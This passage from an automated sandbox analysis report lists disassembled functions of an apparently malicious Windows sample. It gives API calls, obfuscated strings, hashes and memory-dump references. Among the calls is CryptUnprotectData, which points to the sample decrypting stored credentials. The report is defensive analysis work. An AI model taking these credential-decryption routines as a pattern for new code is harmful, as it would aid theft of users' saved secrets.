                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: c8ae2eed087390e3b5345a45e5f3f66bc7dfaec2d21f75609b3f39f951552501
                          • Instruction ID: 897c3335632078df4c40b0e0ed9c0f914793f8d7e3e6ec4bda71861ec0c182a8
                          • Opcode Fuzzy Hash: c8ae2eed087390e3b5345a45e5f3f66bc7dfaec2d21f75609b3f39f951552501
                          • Instruction Fuzzy Hash: EA11A4B4240308BFEB10CF64DC95FAAB7B5FB89700F208058FA159B390C775A941CB60
                          Function 00AF7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00B00E00,00000000,?), ref: 00AF79B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF79B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00B00E00,00000000,?), ref: 00AF79C4
                          • wsprintfA.USER32 ref: 00AF79F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: 0c4ad4554b7b5b0888846c22a97e22fee2a7a677735580b41fdb5c906cba6680
                          • Instruction ID: 8f8f8a41d117873651de59626a104878895887087dba34c6243d51f076ccf57c
                          • Opcode Fuzzy Hash: 0c4ad4554b7b5b0888846c22a97e22fee2a7a677735580b41fdb5c906cba6680
                          • Instruction Fuzzy Hash: 6C112AB2904218ABCB14DFC9DD45BBEB7F8FB4CB11F10411AF605A2280E3795941CBB1
                          Function 00AF7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0179DA98,00000000,?,00B00E10,00000000,?,00000000,00000000), ref: 00AF7A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF7A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0179DA98,00000000,?,00B00E10,00000000,?,00000000,00000000,?), ref: 00AF7A7D
                          • wsprintfA.USER32 ref: 00AF7AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: f68c02ad96ed5b575c13d9042b91dc58edd949b2a325c3ef0c98d019734c0fe7
                          • Instruction ID: 92908e5c21f86b5dacfe3bc3ef735a30bc19e08bd839b1ae56802b7bfb57cfe1
                          • Opcode Fuzzy Hash: f68c02ad96ed5b575c13d9042b91dc58edd949b2a325c3ef0c98d019734c0fe7
                          • Instruction Fuzzy Hash: E41170B1945218EBDB209B58DC45F69B778F704711F104296F616932C0D7741A41CB51
                          Function 00EB57A6 Relevance: 5.3, Strings: 3, Instructions: 1591COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: JW$~>u$fw?
                          • API String ID: 0-3365931923
                          • Opcode ID: 496e91cf79fe2d4cf70f2fc2ebc2235403ea9e3c8a4dfacdecce0e1cee091cae
                          • Instruction ID: 6b47e1e40a57763301f50043c72755c73f0b663726c4a3fa9adac33c19144178
                          • Opcode Fuzzy Hash: 496e91cf79fe2d4cf70f2fc2ebc2235403ea9e3c8a4dfacdecce0e1cee091cae
                          • Instruction Fuzzy Hash: 8BB2FAF360C2009FE308AE2DEC9567AB7E5EF94320F1A893DE6C5C7744EA3558058796
                          Function 00AF3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.COMBASE(00AFE118,00000000,00000001,00AFE108,00000000), ref: 00AF3758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00AF37B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: 6e3ee24d455eb5b278ad4baa7a9579ad12fc83b320e859aa479d25ee3b944a20
                          • Instruction ID: da7cbed123aa9859ddc7adb5c7b22de403bc2806831195cb759708392097e9eb
                          • Opcode Fuzzy Hash: 6e3ee24d455eb5b278ad4baa7a9579ad12fc83b320e859aa479d25ee3b944a20
                          • Instruction Fuzzy Hash: 8841C771A40A2CAFDB24DB58CC95BABB7B5BB48702F4041D8F609E7290D7716E85CF90
                          Function 00AE9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00AE9B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00AE9BA3
                          • LocalFree.KERNEL32(?), ref: 00AE9BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 656719a292b159ebc0402f57fcb9f8a1eaf06da71605487571d46b8cc0f72810
                          • Instruction ID: ce6a89df0dc44a53ab95f16fd2ec38cf3612627fdec85c92933e53c726bbd973
                          • Opcode Fuzzy Hash: 656719a292b159ebc0402f57fcb9f8a1eaf06da71605487571d46b8cc0f72810
                          • Instruction Fuzzy Hash: 7C11C9B8A00309EFDB04DF98D985AAEB7B5FF88300F104598E915A7390D770AE51CFA1
                          Function 00EA9F65 Relevance: 4.1, Strings: 2, Instructions: 1643COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #L-o$#i5
                          • API String ID: 0-3810847561
                          • Opcode ID: 4abd2571412a46fd07473a1ddf1932986516dec9b1e488b215ac2e2311977ae8
                          • Instruction ID: de3b5c9eec25f2ac30754c0e13f80008f07402b59fb9b8aded0369f29f8a4833
                          • Opcode Fuzzy Hash: 4abd2571412a46fd07473a1ddf1932986516dec9b1e488b215ac2e2311977ae8
                          • Instruction Fuzzy Hash: 9DB209F360C2049FE3046E2DEC8577ABBE5EF94720F1A493DEAC4C7744EA3558058696
                          Function 00EAF0E8 Relevance: 4.0, Strings: 2, Instructions: 1461COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: BY/$o@|{
                          • API String ID: 0-2657145581
                          • Opcode ID: 7cd495e33aec36fb5c58cf1b8348eba897e3ef464a8fce3cec8899dd0c1752ab
                          • Instruction ID: 1de1c67d4d78d4291edf75ed6841beb2a3ebefb56e6e587d524a0fe95f16f1a3
                          • Opcode Fuzzy Hash: 7cd495e33aec36fb5c58cf1b8348eba897e3ef464a8fce3cec8899dd0c1752ab
                          • Instruction Fuzzy Hash: 66A205F360C2009FE304AE2DEC8566AFBE9EFD4720F16893DEAC4C7744E63558058696
                          Function 00EB477B Relevance: 3.2, Strings: 2, Instructions: 738COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &?3$EUt
                          • API String ID: 0-3515008038
                          • Opcode ID: 94efc3a972f74c9921cf88635e8f0115645bc8f3bd83f8b5a40be6191d10f2fc
                          • Instruction ID: 60047102aaebe9ae497336513fe643f7c41935be5ace6a46f8636710c5a9fba2
                          • Opcode Fuzzy Hash: 94efc3a972f74c9921cf88635e8f0115645bc8f3bd83f8b5a40be6191d10f2fc
                          • Instruction Fuzzy Hash: 2832BFF260C600AFE3056E29EC8567EFBE9EF94720F16492DE6C483744E6359845CB93
                          Function 00EB23E6 Relevance: 2.9, Strings: 1, Instructions: 1625COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: apRl
                          • API String ID: 0-983971215
                          • Opcode ID: f682b2990edad32e0479356b41b5610b70dd0802a6b7933bf72f50014b3bebba
                          • Instruction ID: 3821181e8f56393eb6dde2331d510e4f596a018ff69837f816b5d158b9beeb8e
                          • Opcode Fuzzy Hash: f682b2990edad32e0479356b41b5610b70dd0802a6b7933bf72f50014b3bebba
                          • Instruction Fuzzy Hash: 20B216F3A0C2049FE3046E2DEC8567ABBE9EF94360F16463DEAC4D3744EA3558058697
                          Function 00FCF299 Relevance: 2.8, Strings: 2, Instructions: 307COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %G|9$]p?n
                          • API String ID: 0-2928256004
                          • Opcode ID: 9ece8693cc481cf0af6f22bf6ea496c863c5d63a57e8ee7cbdc72b5db7194e19
                          • Instruction ID: 6dfe60da141cfa667439caab1f420ce9f36c08eda0ad75adba580119b6f2783d
                          • Opcode Fuzzy Hash: 9ece8693cc481cf0af6f22bf6ea496c863c5d63a57e8ee7cbdc72b5db7194e19
                          • Instruction Fuzzy Hash: E6917CF3A042019FE7149E2CED85767B7D6DB94321F29453EEAC8C3780F63598098796
                          Function 00E176E3 Relevance: 1.5, Strings: 1, Instructions: 202COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Z]{
                          • API String ID: 0-1084309153
                          • Opcode ID: 772b37c8aca1514951aeafd04dfbe67a445ef2770dbe6b978057d89fb0863804
                          • Instruction ID: 147f2d08560509fa51128085895e3aede4b22638b159b650f17da6de5ed4eb43
                          • Opcode Fuzzy Hash: 772b37c8aca1514951aeafd04dfbe67a445ef2770dbe6b978057d89fb0863804
                          • Instruction Fuzzy Hash: 5D5149B3A082105BE705AA2DDC5876BF7D5EFD4720F1B892DEAC993744E9349C0187C6
                          Function 00D7363D Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
